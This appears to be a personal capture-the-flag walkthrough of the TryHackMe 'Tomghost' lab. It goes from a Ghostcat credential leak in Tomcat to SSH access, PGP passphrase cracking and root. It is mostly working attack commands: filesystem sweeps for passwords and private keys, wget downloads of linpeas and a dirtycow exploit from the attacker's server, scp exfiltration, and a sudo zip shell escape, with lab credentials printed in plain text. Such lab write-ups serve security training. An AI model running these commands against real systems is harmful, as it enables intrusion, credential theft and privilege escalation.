Search

Tomghost

Running Tomcat 9.0.3 or something

Google exploits.

There’s one on metasploit

msfconsole
search tomcat
#find auxiliary that reads the credentials file
use auxiliary/admin/http/tomcat_ghostcat

credentials:

skyfuck:8730281lkjlkjdqlksalks

use it on ssh?

ssh skyfuck@10.10.132.129

we get shell! Checks:

sudo -l
grep --color=auto -rnw '/' -ie "PASSWORD=" --color=always 2> /dev/null
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null
history
find / -perm -u=s -type f 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
dpkg -l | grep nginx
getcap -r / 2>/dev/null
env
ls -la

none but we found pgp credential file:

credential.pgp
tryhackme.asc

how to decrypt:

add the key:

gpg --import tryhackme.asc

check the list of keys to see if it’s added:

gpg --list-secret-keys

decrypt:

gpg --output decrypted_credentials.txt --decrypt credential.pgp

read it:

cat decrypted_credentials.txt

this doesn’t let us though. It needs passphrase LinPEAS?************

cd transfer
python3 -m http.server 80
wget http://10.6.62.12/linpeas.sh

give it perms:

chmod +x linpeas.sh

run it:

./linpeas.sh

it found dirtycow

+

it gave us writable path:

https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses

Try dirtycow first:

wget http://10.6.62.12/dirtycow.c

compile:

gcc -pthread dirty.c -o dirty -lcrypt

run it:

./dirtycow
#or 
./dirtycow bmw340i

switch user by:

su firefart

or

ssh firefart@10.10.132.129

This machine does not have gcc!

Can we get the pgp to work on our machine?

send files to our machine:

scp skyfuck@10.10.132.129:tryhackme.asc .

password:

8730281lkjlkjdqlksalks

other file:

scp skyfuck@10.10.132.129:credential.pgp .

*************the passphrase can be cracked with johntheripper!

https://www.openwall.com/lists/john-users/2015/11/17/1

gpg2john tryhackme.asc > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

cracked:

alexandru

use it to decrypt?

gpg --output decrypted_credentials.txt --decrypt credential.pgp

cat the decrypted:

cat decrypted_credentials.txt

we get new login:

merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j

ssh?

ssh merlin@10.10.132.129

basic check:

sudo -l

we have sudo no password for zip. Check GTFOBins?

we have!

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'bash #'
sudo rm $TF

^edited to use bash instead of sh

cd /root
cat root.txt